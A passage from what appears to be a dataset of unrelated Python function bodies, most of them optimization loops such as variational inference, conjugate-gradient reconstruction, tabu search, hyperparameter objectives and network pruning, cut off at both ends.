None\n\n for i in range(self.iterations):\n x = self.draw_normal()\n gradient = self.cv_gradient(x)\n gradient[np.isnan(gradient)] = 0\n self.change_parameters(self.optim.update(gradient))\n\n if self.printer is True:\n self.print_progress(i, self.optim.parameters[::2])\n\n # Construct final parameters using final 10% of samples\n if i > self.iterations-round(self.iterations/10):\n final_samples += 1\n final_parameters = final_parameters+self.optim.parameters\n\n if self.record_elbo is True:\n elbo_records[i] = self.get_elbo(self.optim.parameters[::2])\n\n final_parameters = final_parameters/float(final_samples)\n self.change_parameters(final_parameters)\n final_means = np.array([final_parameters[el] for el in range(len(final_parameters)) if el%2==0])\n final_ses = np.array([final_parameters[el] for el in range(len(final_parameters)) if el%2!=0])\n if not self.quiet_progress:\n print(\"\")\n print(\"Final model ELBO is \" + 
str(-self.full_neg_posterior(final_means)-self.create_normal_logq(final_means)))\n return self.q, final_means, final_ses, elbo_records", "def run(self):\n\n # Initialization assumptions\n z = self.draw_normal_initial()\n gradient = self.cv_gradient_initial(z)\n gradient[np.isnan(gradient)] = 0\n variance = np.power(gradient, 2) \n final_parameters = self.current_parameters()\n final_samples = 1\n\n # Create optimizer\n if self.optimizer == 'ADAM':\n self.optim = ADAM(final_parameters, variance, self.learning_rate, 0.9, 0.999)\n elif self.optimizer == 'RMSProp':\n self.optim = RMSProp(final_parameters, variance, self.learning_rate, 0.99)\n\n # Record elbo\n if self.record_elbo is True:\n elbo_records = np.zeros(self.iterations)\n else:\n elbo_records = None\n\n for i in range(self.iterations):\n x = self.draw_normal()\n gradient = self.cv_gradient(x)\n gradient[np.isnan(gradient)] = 0\n self.change_parameters(self.optim.update(gradient))\n\n if self.printer is True:\n self.print_progress(i, self.optim.parameters[::2])\n\n # Construct final parameters using final 10% of samples\n if i > self.iterations-round(self.iterations/10):\n final_samples += 1\n final_parameters = final_parameters+self.optim.parameters\n\n if self.record_elbo is True:\n elbo_records[i] = self.get_elbo(self.optim.parameters[::2])\n\n final_parameters = final_parameters/float(final_samples)\n self.change_parameters(final_parameters)\n final_means = np.array([final_parameters[el] for el in range(len(final_parameters)) if el%2==0])\n final_ses = np.array([final_parameters[el] for el in range(len(final_parameters)) if el%2!=0])\n if not self.quiet_progress:\n print(\"\")\n print(\"Final model ELBO is \" + str(-self.neg_posterior(final_means)-self.create_normal_logq(final_means)))\n return self.q, final_means, final_ses, elbo_records", "def optimize_parameters(self):\n pass", "def optimize_parameters(self):\n pass", "def optimize_parameters(self):\n pass", "def intermediate(self, alg_mod, iter_count, obj_value,\n inf_pr, inf_du, mu, d_norm, regularization_size,\n alpha_du, alpha_pr, ls_trials):\n # TODO: Document the arguments\n pass", "def _function(self):\n\n\n\n def calculate_weights():\n \"\"\"\n calculate a weight inversely proportional to the expected to duration of the two steps in the\n script\n\n Returns: weights as a dictionary for the two steps\n\n \"\"\"\n weights = {}\n\n\n # estimate run time of step 1 (fast sweep)\n f_range = sweeper_script.settings['stop'] - sweeper_script.settings['start']\n N_samples = sweeper_script.settings['samplecount']\n df = f_range / N_samples\n\n t = N_samples / df\n\n weights['quick scan'] = t\n\n # estimate run time of step 2 (high res sweep)\n df = self.settings['high_res_df']\n N_samples = self.settings['high_res_N']\n\n t = N_samples / df\n\n weights['high res scan'] = t\n\n\n total_time = sum([v for k, v in weights.iteritems()])\n\n weights = {k: v/total_time for k, v in weights.iteritems()}\n\n print('weights',weights)\n\n return weights\n\n def run_scan(name):\n self.current_subscript = name\n sweeper_script.start()\n while self.current_subscript is name:\n time.sleep(0.1)\n\n def calc_new_range():\n\n\n df = self.settings['high_res_df']\n N = self.settings['high_res_N']\n\n r = sweeper_script.data[-1]['r']\n freq = sweeper_script.data[-1]['frequency']\n freq = freq[np.isfinite(r)]\n r = r[np.isfinite(r)]\n\n fo = freq[np.argmax(r)]\n\n f_start, f_end = fo - N/2 *df, fo + N/2 *df\n\n\n # make sure that we convert back to native python types (numpy file types don't pass the 
Parameter validation)\n return float(f_start), float(f_end), int(N)\n\n\n sweeper_script = self.scripts['zi sweep']\n #save initial settings, so that we can rest at the end of the script\n initial_settings = deepcopy(sweeper_script.settings)\n self.weights = calculate_weights()\n\n # take the signal from the subscript and route it to a function that takes care of it\n sweeper_script.updateProgress.connect(self._receive_signal)\n\n print('====== start quick scan ============')\n\n run_scan('quick scan')\n\n print('====== calculate new scan range ====')\n f_start, f_stop, N = calc_new_range()\n\n print('f_start, f_stop, N', f_start, f_stop, N)\n\n print('====== update sweeper ==============')\n sweeper_script.update({\n 'start' : f_start,\n 'stop' : f_stop,\n 'samplecount' : N\n })\n\n print('====== start high res scan =========')\n # print(sweeper_script.sweeper.finished())\n # print(sweeper_script.sweeper.progress())\n\n run_scan('high res scan')\n\n sweeper_script.updateProgress.disconnect()\n self.data = sweeper_script.data[-1]\n\n self._recording = False\n\n if self.settings['save']:\n self.save()\n\n # set the sweeper script back to initial settings\n sweeper_script.update(initial_settings)\n # make sure that progess is set 1o 100 because we check that in the old_gui\n self.updateProgress.emit(100)", "def run(self):\n if not self._no_progress and self._verbose:\n from progressbar import ProgressBar\n progress = ProgressBar()\n iter_range = progress(range(self._iters))\n else:\n iter_range = range(self._iters)\n\n if self._no_progress and self._time_iters:\n from time import time\n\n i = 0\n try:\n for i in iter_range:\n if self._verbose and self._no_progress:\n print(\"Iteration \" + repr(i))\n\n if self._no_progress and self._time_iters:\n start = time()\n\n self.iteration += 1\n\n self._forward(self._p_k, self._v_k)\n sigma_k = measure(self._p_k, self._v_k)\n alpha_k = self._rho_k / sigma_k\n if self._double:\n update_m_double(self._m, alpha_k, self._p_k)\n sub_scaled_vector_double(self._residual_k,\n self._residual_k,\n alpha_k, self._v_k)\n else:\n update_m(self._m, alpha_k, self._p_k)\n sub_scaled_vector(self._residual_k, self._residual_k,\n alpha_k, self._v_k)\n self._v_k = gpuarray_copy(self._residual_k)\n rho_k_plus_1 = measure(self._v_k, self._residual_k)\n rho_k_t = np.abs(rho_k_plus_1)\n\n if (rho_k_t / self._rho_0 <= self._relative_tolerance) \\\n or (rho_k_t <= self._absolute_tolerance):\n print(\"Converged.\")\n self.converged = True\n break\n\n if self._double:\n add_scaled_vector_double(self._p_k, self._v_k,\n rho_k_plus_1/self._rho_k,\n self._p_k)\n else:\n add_scaled_vector(self._p_k, self._v_k,\n rho_k_plus_1/self._rho_k, self._p_k)\n\n self._rho_k = rho_k_plus_1\n\n if self._noisy:\n print(\" Residual=\" + str(rho_k_t))\n\n if self._no_progress and self._time_iters:\n print(\"Elapsed time for iteration \" + str(i) + \": \" +\n str(time() - start) + \" seconds\")\n\n if self._save_images:\n save_image(np.abs(self._m.get().reshape(self._data.nX1,\n self._data.nX2)),\n self._out_dir, i, self._image_format)\n if self._save_matlab:\n save_matlab(self._m.get().reshape(self._data.nX1,\n self._data.nX2),\n self._out_dir, i)\n except KeyboardInterrupt:\n print(\"Reconstruction aborted (CTRL-C) at iteration \" + str(i))\n finally:\n if self._save_images:\n save_image(np.abs(self._m.get().reshape(self._data.nX1,\n self._data.nX2)),\n self._out_dir, \"result\", self._image_format)\n if self._save_matlab:\n save_matlab(self._m.get().reshape(self._data.nX1,\n self._data.nX2),\n 
self._out_dir, \"result\")\n self.iteration = i+1\n return (self._m.get().reshape(self._data.nX1, self._data.nX2),\n self.iteration)", "def update():\n global iteration, result\n iteration += 1\n # Stop iterating after max_iterations\n if iteration >= max_iterations:\n timer.stop()\n print \"Output is\", result\n else:\n result = get_next(result)", "def objective(hyperparams): \n global iteration #necessary with a global variable because of implementation from hyperopt. \n iteration += 1\n\n result = run_model(hyperparams, iteration)\n loss = -result #transform to loss in order to minimize\n\n return {'loss': loss, 'hyperparams': hyperparams, 'iteration': iteration, 'status': STATUS_OK}", "def on_iteration_start(self):\n\n self.Xprv = self.X.copy()\n if (not self.opt['FastSolve'] or isinstance(self.backtrack,\n BacktrackRobust)):\n self.Yprv = self.Y.copy()\n\n if self.opt['Monotone']:\n if self.k == 0:\n self.objfn = self.eval_objfn()\n self.objfn_prev = self.objfn", "def fit(self):\n self._minuit_problem.migrad() # run optimizer\n self._status = 0 if self._minuit_problem.migrad_ok() else 1", "def optimize(self,max_iter=100):\n\n\n for itr in range(max_iter):\n opt_logs = self.opt.minimize(self.tot_neg_elbo,sum([expert.trainable_variables for expert in self.experts],())) \n print(self.neg_elbo)", "def optimize(self):\n prm = (self.b,self.c)\n d = self.d\n no = int(d*d)\n bounds = [(-1,1)]*no\n resG = differential_evolution(inpSc.entBias, bounds, args = prm, popsize = 40, disp = False)\n\n xOpt = resG.x\n xOpt = xOpt/(np.linalg.norm(xOpt))\n\n #Refine the global optimization by performing a second local optimizaiton\n x0 = xOpt\n\n res = minimize(inpSc.entBias, x0, args = prm, method='BFGS', options={'disp': False})\n xOpt = res.x\n xOpt = xOpt/(np.linalg.norm(xOpt))\n self.rhoOp = inpSc.getMat(xOpt, d)\n self.Q1 = -res.fun", "def search(self):\n self.iteration = 0\n while self.iteration < self.maxIterations:\n self.GAStep()\n self.iteration += 1\n\n print (\"Total iterations: \",self.iteration)\n print (\"Best Solution: \", self.best.getFitness())", "def run_step_blackbox_optimizer(config,\n current_input,\n blackbox_optimizer,\n proposed_perturbations,\n finished_dnas,\n results,\n logging_data=None):\n core_hyperparameters = blackbox_optimizer.get_hyperparameters()\n function_values = [0.0] * len(proposed_perturbations)\n rewards_for_controller = []\n perturbations = proposed_perturbations\n evaluation_stats = []\n current_value_exact = 0.0\n current_value_exact_counter = 0\n\n for i in range(len(results)):\n rewards_for_controller.append(results[i]['function_value'])\n tag = results[i]['tag']\n index = 0\n if tag > 0:\n if config.est_type == 'antithetic':\n index = (tag - 1) * 2\n function_values[index] += results[i]['function_value']\n else:\n index = tag - 1\n function_values[index] += results[i]['function_value']\n if tag < 0:\n index = (-tag - 1) * 2 + 1\n function_values[index] += results[i]['function_value']\n if tag == 0:\n current_value_exact += results[i]['function_value']\n current_value_exact_counter += 1\n current_value_exact /= float(current_value_exact_counter)\n\n for result in results:\n evaluation_stat = list(result['evaluation_stat'])\n evaluation_stats.append(evaluation_stat)\n\n function_values_reshaped = np.array(function_values)\n perturbations_reshaped = np.array(perturbations)\n\n logging.info('LIST OF FUNCTION VALUES')\n logging.info(function_values_reshaped)\n\n logging.info('MAX VALUE SEEN CURRENTLY')\n logging.info(np.max(function_values_reshaped))\n\n 
logging.info('MEAN OF VALUES')\n logging.info(np.mean(function_values_reshaped))\n\n if logging_data is not None:\n iteration = logging_data['iteration']\n best_value = logging_data['best_value']\n iteration = logging_data['iteration']\n best_input = logging_data['best_input']\n best_core_hyperparameters = logging_data['best_core_hyperparameters']\n optimizer_state = blackbox_optimizer.get_state()\n\n if current_value_exact > best_value[0]:\n best_value[0] = current_value_exact\n best_input = current_input\n best_core_hyperparameters = core_hyperparameters\n\n # Writing logs.\n if iteration % config.log_frequency == 0:\n util.log_row(config.params_file, current_input)\n util.log_row(config.best_params_file, best_input)\n util.log_row(config.best_core_hyperparameters_file,\n best_core_hyperparameters)\n util.log_row(config.best_value_file, best_value)\n util.log_row(config.optimizer_internal_state_file, optimizer_state)\n util.log_row(config.current_values_list_file, [current_value_exact])\n util.log_row(config.best_values_list_file, [best_value[0]])\n util.log_row(config.fvalues_file, function_values_reshaped)\n util.log_row(config.iteration_file, [iteration])\n\n print('Current exact value estimate:')\n print(current_value_exact)\n sys.stdout.flush()\n\n new_current_input = blackbox_optimizer.run_step(perturbations_reshaped,\n function_values_reshaped,\n current_input,\n current_value_exact)\n config.controller.collect_rewards_and_train(rewards_for_controller,\n finished_dnas)\n\n evaluation_stats_reduced = [sum(x) for x in zip(*evaluation_stats)]\n blackbox_optimizer.update_state(evaluation_stats_reduced)\n\n return [True, new_current_input]", "def optimize(self): \n if self.model == 'ARD':\n estimate = minimize(\n fun=optim_func,\n x0=np.array([self.alpha, self.beta]),\n args=(self,),\n method='L-BFGS-B',\n bounds=((0, 50), (0, 50)),\n )\n # logger.info(estimate)\n\n # organize into a dict\n result = {\n \"alpha\": estimate.x[0],\n \"beta\": estimate.x[1],\n \"Lik\": estimate.fun,\n \"negLogLik\": -np.log(-estimate.fun),\n \"convergence\": estimate.success,\n }\n logger.debug(result)\n\n elif self.model == 'ER':\n estimate = minimize(\n fun=optim_func,\n x0=np.array([self.alpha]),\n args=(self,),\n method='L-BFGS-B',\n bounds=[(0, 50)],\n )\n\n result = {\n \"alpha\": estimate.x[0],\n \"Lik\": estimate.fun, \n \"negLogLik\": -np.log(-estimate.fun),\n \"convergence\": estimate.success,\n }\n logger.debug(result)\n\n else:\n raise Exception('model must be specified as either ARD or ER')\n\n # get scaled likelihood values\n self.log_lik = result[\"negLogLik\"]\n self.tree = self.tree.set_node_values(\n 'likelihood',\n values={\n node.idx: np.array(node.likelihood) / sum(node.likelihood)\n for node in self.tree.idx_dict.values()\n }\n )", "def iterate_value(self):\n self.V = np.zeros(self.stateCount)\n for i in range(self.maxIter):\n last_V = np.copy(self.V)\n for state_index in range(self.stateCount):\n current_state = self.env.statespace[state_index]\n for action in self.env.actionspace:\n next_state = self.env.next_state(current_state,action)\n reward = self.env.compute_reward(next_state)\n next_state_index = self.env.stateDict[next_state]\n self.Q[state_index][action] = reward + self.gamma*last_V[next_state_index]\n if self.mode == 'debug':\n print(\"Q(s={}):{}\".format(current_state,self.Q[state_index]))\n self.V[state_index] = max(self.Q[state_index])\n if np.sum(np.fabs(last_V - self.V)) <= self.th:\n print (\"Convergene Achieved in {}th iteration. 
\"\n \"Breaking V_Iteration loop!\".format(i))\n break", "def optimize(self, ngen):\n res = 0\n for res in self(ngen):\n pass\n return res", "def on_iteration_start(self):\n\n self.Xfprv = self.Xf.copy()\n if (not self.opt['FastSolve'] or isinstance(self.backtrack,\n BacktrackRobust)):\n self.Yfprv = self.Yf.copy()\n\n if self.opt['Monotone']:\n if self.k == 0:\n self.objfn = self.eval_objfn()\n self.objfn_prev = self.objfn", "def run(self):\n\n # init\n base_value = self._problem.evaluate()\n self._problem.set_as_best(base_value)\n\n # init iteration (used to count the amount of iterations)\n iteration = 0\n\n # add to data\n self._data_append(self.data, iteration, base_value, base_value)\n\n # init termination criterion\n self._termination_criterion.check_first_value(base_value)\n self._termination_criterion.start_timing()\n\n # main loop\n while self._termination_criterion.keep_running():\n\n # search the neighbourhood for the best move\n best_found_delta = self._best_found_delta_base_value\n best_found_move = None\n\n for move in self._problem.get_moves():\n\n # check quality move\n delta = self._problem.evaluate_move(move)\n\n # checks how the move alters the current state\n diff = self._diff(move)\n\n # if not in tabu list --> not similar to earlier performed\n # moves --> if delta better than old best move\n # --> becomes the best move\n\n if not self._tabu_list.contains(diff) and \\\n self._is_better(best_found_delta, delta):\n best_found_delta = delta\n best_found_move = move\n best_found_diff = diff\n\n # the best found move will be used as the next move\n # alter state problem\n base_value = base_value + best_found_delta\n\n # check if a move was found\n if best_found_move is not None:\n\n self._problem.move(best_found_move)\n\n # if better than best found --> new best_found\n if self._is_better(self._problem.best_order_value,\n base_value):\n self._problem.set_as_best(base_value)\n # log the better solution\n self._log_improvement(base_value)\n\n # add diff to tabu list\n self._tabu_list.add(best_found_diff)\n\n # add to data\n self._data_append(self.data, iteration,\n base_value, self._problem.best_order_value)\n\n self._termination_criterion.check_new_value(base_value)\n\n # functions _termination_criterion called\n self._termination_criterion.check_new_value(base_value)\n\n else:\n # no move found --> we're stuck --> break loop\n break\n\n iteration += 1\n self._termination_criterion.iteration_done()\n\n # last data point\n self._data_append(self.data, iteration, base_value,\n self._problem.best_order_value)\n\n # if we have data:\n # convert data to something easier to plot\n if self.data is not None:\n\n # convert to tuple of list\n data = convert_data(self.data)\n\n # make namedtuple\n DataAsLists = namedtuple(\n 'Data', ['time', 'iteration', 'value', 'best_value'])\n\n data = DataAsLists(data[0], data[1], data[2], data[3])\n\n else:\n data = None\n\n # return results\n\n Results = namedtuple('Results', ['best_order', 'best_value', 'data'])\n\n return Results(self._problem.best_order,\n self._problem.best_order_value,\n data)", "def compute_gradient(self, verbose):\n from inversionson.helpers.autoinverter_helpers import IterationListener\n\n # Attempt to dispatch model smoothing right at the beginning.\n # So there is no smoothing bottleneck when updates are not smoothed.\n it_listen = IterationListener(\n self.comm,\n events=self.comm.project.events_in_iteration)\n it_listen.listen()\n\n self.task_dict[\"forward_submitted\"] = True\n self.task_dict[\"misfit_completed\"] 
= True\n self.task_dict[\"gradient_completed\"] = True\n self._update_task_file()\n self.finish_task()", "def solve(self, regparam):\n self.regparam = regparam\n \n #Some counters for bookkeeping\n self.stepcounter = 0\n self.flipcounter = 0\n self.nochangecounter = 0\n \n #Cached results\n self.evals = np.multiply(self.svals, self.svals)\n self.newevals = 1. / (self.evals + self.regparam)\n newevalslamtilde = np.multiply(self.evals, self.newevals)\n self.D = np.sqrt(newevalslamtilde)\n #self.D = -newevalslamtilde\n \n self.VTY = self.svecs.T * self.Y\n DVTY = np.multiply(self.D.T, self.svecs.T * self.Y)\n \n #Using lists in order to avoid unnecessary matrix slicings\n self.DVTY_list = []\n self.YTVDDVTY_list = []\n self.classFitnessList = []\n for i in range(self.labelcount):\n DVTY_i = DVTY[:,i]\n self.DVTY_list.append(DVTY_i)\n YTVDDVTY_i = DVTY_i.T * DVTY_i\n self.YTVDDVTY_list.append(YTVDDVTY_i)\n fitness_i = self.size - DVTY_i.T * DVTY_i\n self.classFitnessList.append(fitness_i)\n \n self.Dsvecs_list = []\n self.svecsDDsvecs_list = []\n for i in range(self.size):\n Dsvec = np.multiply(self.D.T, self.svecs[i].T)\n self.Dsvecs_list.append(Dsvec)\n self.svecsDDsvecs_list.append(Dsvec.T*Dsvec)\n \n self.updateA()\n \n \n converged = False\n print(self.classcounts.T)\n if self.callbackfun is not None:\n self.callbackfun.callback(self)\n while True:\n \n converged = self.roundRobin()\n print(self.classcounts.T)\n if self.callbackfun is not None:\n self.callbackfun.callback(self)\n if converged: break\n \n if self.oneclass:\n self.Y = self.Y[:, 0]\n self.A = self.A[:, 0]\n self.results['predicted_clusters_for_training_data'] = self.Y\n self.predictor = self.svdad.createModel(self)", "def step(self, closure: Callable = None):\n loss = self.optimizer.step(closure)\n self._k_counter += 1\n\n if self._k_counter >= self.k:\n self._k_counter = 0\n # Lookahead and cache the current optimizer parameters\n for group in self.optimizer.param_groups:\n for p in group[\"params\"]:\n param_state = self.state[p]\n p.data.mul_(self.alpha).add_(\n param_state[\"slow_params\"], alpha=1.0 - self.alpha\n )\n param_state[\"slow_params\"].copy_(p.data)\n return loss", "def callback(_locals, _globals):\n global n_steps, best_mean_reward\n # Print stats every 1000 calls\n if (n_steps + 1) % 1000 == 0:\n # Evaluate policy training performance\n x, y = ts2xy(load_results(log_dir), 'timesteps')\n if len(x) > 0:\n mean_reward = np.mean(y[-100:])\n print(x[-1], 'timesteps')\n print(\"Best mean reward: {:.2f} - Last mean reward per episode: {:.2f}\".format(best_mean_reward, mean_reward))\n\n # New best model, you could save the agent here\n if mean_reward > best_mean_reward:\n best_mean_reward = mean_reward\n # Example for saving best model\n print(\"Saving new best model\")\n _locals['self'].save(log_dir + str(x[-1])+'best_model.pkl')\n n_steps += 1\n return True", "def optimize(self, num_restarts=1, max_iters=100, max_f_eval=300.0, method='Anneal'):\n dic = DictVectorizer()\n # flatten the parameters\n init_params,bounds=dic.fit_transform(self.params)\n #we minimise minus the marginal likelihood\n def objective(params_flatten):\n self.params=dic.inverse_transform(params_flatten,bounds)\n val = -self.log_marginal_likelihood()\n return val# we want to maximize it\n \n \n #run ptimisation with multiple restarts\n optml=np.inf\n for i in range(num_restarts):\n #minimise function\n if method=='Anneal':\n res=dual_annealing(objective,bounds, maxiter=max_iters, maxfun=max_f_eval, x0=init_params)\n else:\n \n res = 
minimize(objective, init_params, \n bounds=bounds, method=method,options={'maxiter': max_iters, 'disp': False})\n #print(\"Iteration \"+str(i)+\" \",-res.fun)\n if res.fun<optml:\n params_best=res.x #init_params \n optml=res.fun\n init_params=bounds[:,0]+(bounds[:,1]-bounds[:,0])*np.random.rand(len(bounds[:,0]))\n print(\"Iteration \"+str(i)+\" \",-res.fun)\n #params_best=res.x\n #optml=res.fun\n self.params=dic.inverse_transform(params_best,bounds)\n return -optml", "def minimize(self):\n pass", "def optimize(self, return_teacher_params_bool = False):\n\n gen_batches = self.DATASET.data_stream(self.BATCH_SIZE)\n \n num_complete_batches, leftover = divmod(self.DATASET.num_example['train'], self.BATCH_SIZE)\n\n # number of minibatches per epoch\n num_mini_batches_per_epochs = num_complete_batches + bool(leftover)\n\n # number of total iterations\n num_total_iters = self.NUM_EPOCHS * num_mini_batches_per_epochs\n\n # number of time that the sparisty levels get updated\n num_sparsity_updates = num_total_iters // self.MASK_UPDATE_FREQ \n \n mask_update_limit = num_total_iters - self.MASK_UPDATE_FREQ\n \n if self.SAVE_BOOL == True:\n # save the transferred results in the desinated directory.\n\n trans_model_dir = self.unique_model_dir\n\n# while os.path.exists(trans_model_dir):\n# trans_model_dir = trans_model_dir + '_0'\n \n if not os.path.exists(trans_model_dir):\n os.makedirs(trans_model_dir)\n\n np.save(trans_model_dir + '/param_dict.npy', self.param_dict) \n \n \n\n nt_trans_params_all_sparsities_all_runs = []\n nt_trans_masks_all_sparsities_all_runs = []\n nt_trans_vali_all_sparsities_all_runs = []\n teacher_params_all_sparsities_all_runs = []\n \n \n num_sparisty_levels = len(self.NN_DENSITY_LEVEL_LIST) \n num_runs = len(range(self.INIT_RUN_INDEX, self.INIT_RUN_INDEX + self.NUM_RUNS ))\n all_density_all_run_num_total_iters = num_sparisty_levels * num_runs * num_total_iters\n \n \n for nn_density_level in self.NN_DENSITY_LEVEL_LIST: \n \n \n nt_trans_params_all_runs = []\n nt_trans_masks_all_runs = []\n nt_trans_vali_all_runs = []\n teacher_params_all_runs = []\n\n\n for run_index in range(self.INIT_RUN_INDEX, self.INIT_RUN_INDEX + self.NUM_RUNS ):\n\n # do logging\n for handler in logging.root.handlers[:]:\n logging.root.removeHandler(handler)\n\n # a string that summarizes the current ntt experiment\n model_summary_str = self.model_str + '_density_' + str(round(nn_density_level, 2) ) + '_run_' + str(run_index)\n\n if self.SAVE_BOOL == True:\n model_dir_density_run = trans_model_dir + '/' + 'density_' + str(round(nn_density_level, 2) ) + '/' + 'run_' + str(run_index) + '/'\n\n os.makedirs(model_dir_density_run)\n \n logging.basicConfig(filename = model_dir_density_run + \"/\" + model_summary_str + \"_log.log\", format='%(asctime)s %(message)s', filemode='w', level=logging.DEBUG)\n\n else: \n logging.basicConfig(filename = model_summary_str + \"_log.log\" , format='%(asctime)s %(message)s', filemode='w', level=logging.DEBUG)\n \n \n # for different run indices, randomly draw teacher net's parameters\n _, teacher_net_params = self.init_fun(random.PRNGKey(run_index), tuple(self.batch_input_shape))\n \n # the prediction of the teacher net evaluated on validation samples\n vali_teacher_prediction = self.apply_fn(teacher_net_params, self.vali_samples)\n\n vali_teacher_ntk_mat = self.emp_ntk_fn(self.vali_inputs_1, self.vali_inputs_2, teacher_net_params) \n\n # the initial binary mask\n \n if self.PRUNE_METHOD == 'magnitude': \n masks = get_masks_from_jax_params(teacher_net_params, 
nn_density_level, global_bool = self.GLOBAL_PRUNE_BOOL)\n elif self.PRUNE_METHOD == 'logit_snip':\n logger.info(\"Use logit snip method to get the initial mask\")\n num_examples_snip = 128\n\n# gen_batches_logit_snip = self.DATASET.data_stream(num_examples_snip)\n \n snip_input = self.DATASET.dataset['train']['input'][:num_examples_snip, :]\n \n if self.GLOBAL_PRUNE_BOOL == False:\n logger.warning(\"layerwise sparse net initialized with logit_snip\") \n masks = get_logit_snip_masks(teacher_net_params, nn_density_level, self.apply_fn, snip_input, self.batch_input_shape, GlOBAL_PRUNE_BOOL = self.GLOBAL_PRUNE_BOOL) \n else:\n raise NotImplementedError(\"not implemented\")\n \n\n # the initial student parameters\n masked_student_net_params = get_sparse_params_filtered_by_masks(teacher_net_params, masks)\n\n # instantiate the optimizer triple \n opt_init, opt_update, get_params = self.OPTIMIZER_WITH_PARAMS\n\n opt_state = opt_init(teacher_net_params) \n\n # one step of NTK transfer\n @jit\n def nt_transfer_step(i, opt_state, x, masks):\n\n # parameters in the current optimizer state\n student_net_params = get_params(opt_state)\n\n # gradients that flow through the binary masks\n masked_g = grad(self.nt_transfer_loss)(student_net_params, masks, teacher_net_params, x, nn_density_level)\n\n return opt_update(i, masked_g, opt_state)\n\n # a list of validation loss\n vali_loss_list = []\n\n # calculate the initial validation loss. \n vali_loss = self.eval_nt_transfer_loss_on_vali_data(masked_student_net_params, vali_teacher_prediction, vali_teacher_ntk_mat, nn_density_level)\n\n vali_loss_list.append(vali_loss)\n\n logger.info(\"Before transfer: trans dist %.3f | ntk dist %.3f | targ dist %.3f | l2 pentalty %.3f | nn density %.2f\", vali_loss[0], vali_loss[1], vali_loss[2], vali_loss[3], nn_density_level)\n itercount = itertools.count()\n\n t = time.time()\n\n # loop through iterations\n for num_iter in range(1, num_total_iters + 1): \n \n # a batch of input data\n batch_xs, _ = next(gen_batches) \n\n # reshape the input to a proper format (2d array for MLP and 3d for CNN)\n batch_xs = batch_xs.reshape(self.batch_input_shape) \n\n # update the optimizer state\n opt_state = nt_transfer_step(next(itercount), opt_state, batch_xs, masks )\n\n\n if num_iter % 100 == 0:\n elapsed_time = time.time() - t\n \n if (num_iter <= 500) and (run_index == self.INIT_RUN_INDEX) and (nn_density_level == self.NN_DENSITY_LEVEL_LIST[0]): \n # estimate the program end time.\n remaining_iter_num = all_density_all_run_num_total_iters - num_iter\n remaining_seconds = elapsed_time * ( remaining_iter_num / 100 )\n expected_end_time = str(datetime.now() + timedelta(seconds = remaining_seconds))\n\n # get parameters from the current optimizer state\n student_net_params = get_params(opt_state) \n\n # filter the paramters by masks\n masked_student_net_params = get_sparse_params_filtered_by_masks(student_net_params , masks)\n \n # validation loss\n vali_loss = self.eval_nt_transfer_loss_on_vali_data(masked_student_net_params, vali_teacher_prediction, vali_teacher_ntk_mat, nn_density_level) \n\n vali_loss_list.append(vali_loss)\n\n logger.info('run: %02d/%02d | iter %04d/%04d | trans. dist %.3f | ntk dist %.3f | targ. 
dist %.3f | l2 %.3f | nn density %.2f | time %.2f [s] | expected finish time %s', run_index, self.NUM_RUNS + self.INIT_RUN_INDEX - 1, num_iter, num_total_iters, vali_loss[0], vali_loss[1], vali_loss[2], vali_loss[3], nn_density_level, elapsed_time, expected_end_time)\n t = time.time()\n\n\n if (num_iter % self.MASK_UPDATE_FREQ == 0) and (num_iter < mask_update_limit):\n # get parameters from the current optimizer state\n student_net_params = get_params(opt_state) \n \n # update masks\n masks = get_masks_from_jax_params(student_net_params, nn_density_level, global_bool = self.GLOBAL_PRUNE_BOOL)\n \n# if self.PRUNE_METHOD == 'logit_snip':\n# logit_snip_batch_xs, _ = next(gen_batches_logit_snip)\n# masks = get_logit_snip_masks(student_net_params, nn_density_level, self.apply_fn, snip_input, self.batch_input_shape, GlOBAL_PRUNE_BOOL = self.GLOBAL_PRUNE_BOOL) \n# else:\n# masks = get_masks_from_jax_params(student_net_params, nn_density_level, global_bool = self.GLOBAL_PRUNE_BOOL)\n\n\n \n elapsed_time = time.time() - t\n \n student_net_params = get_params(opt_state) \n \n # filter the paramters by masks\n masked_student_net_params = get_sparse_params_filtered_by_masks(student_net_params , masks)\n \n vali_loss = self.eval_nt_transfer_loss_on_vali_data(masked_student_net_params, vali_teacher_prediction, vali_teacher_ntk_mat, nn_density_level) \n\n vali_loss_list.append(vali_loss)\n \n logger.info('run: %02d/%02d | iter %04d/%04d | trans. dist %.3f | ntk dist %.3f | targ. dist %.3f | l2 %.3f | nn density %.2f | time %.2f [s]', run_index, self.NUM_RUNS + self.INIT_RUN_INDEX - 1, num_iter, num_total_iters, vali_loss[0], vali_loss[1], vali_loss[2], vali_loss[3], nn_density_level, elapsed_time )\n \n vali_loss_array = np.array(vali_loss_list)\n\n nt_trans_params_all_runs.append(masked_student_net_params)\n nt_trans_masks_all_runs.append(masks)\n nt_trans_vali_all_runs.append(vali_loss_array)\n teacher_params_all_runs.append(teacher_net_params )\n\n if self.SAVE_BOOL == True:\n\n model_summary_str = self.model_str + '_density_' + str(round(nn_density_level, 2) ) + '_run_' + str(run_index)\n\n teacher_param_fileName = model_dir_density_run + 'teacher_params_' + model_summary_str\n np.save(teacher_param_fileName, teacher_net_params)\n\n student_param_fileName = model_dir_density_run + 'transferred_params_' + model_summary_str\n np.save(student_param_fileName, masked_student_net_params)\n\n mask_fileName = model_dir_density_run + 'transferred_masks_' + model_summary_str\n np.save(mask_fileName, masks)\n\n loss_array_fileName = model_dir_density_run + 'loss_array_' + model_summary_str\n np.save(loss_array_fileName, vali_loss_array)\n \n\n nt_trans_params_all_sparsities_all_runs.append( nt_trans_params_all_runs )\n nt_trans_masks_all_sparsities_all_runs.append( nt_trans_masks_all_runs )\n nt_trans_vali_all_sparsities_all_runs.append( nt_trans_vali_all_runs )\n teacher_params_all_sparsities_all_runs.append( teacher_params_all_runs )\n \n if return_teacher_params_bool:\n return nt_trans_params_all_sparsities_all_runs, nt_trans_masks_all_sparsities_all_runs, nt_trans_vali_all_sparsities_all_runs, teacher_params_all_sparsities_all_runs\n\n else:\n return nt_trans_params_all_sparsities_all_runs, nt_trans_masks_all_sparsities_all_runs, nt_trans_vali_all_sparsities_all_runs", "def step(self, closure=None):\n loss = None\n if closure is not None:\n loss = closure()\n for m in self.optimizers:\n m.step()\n return loss", "def 
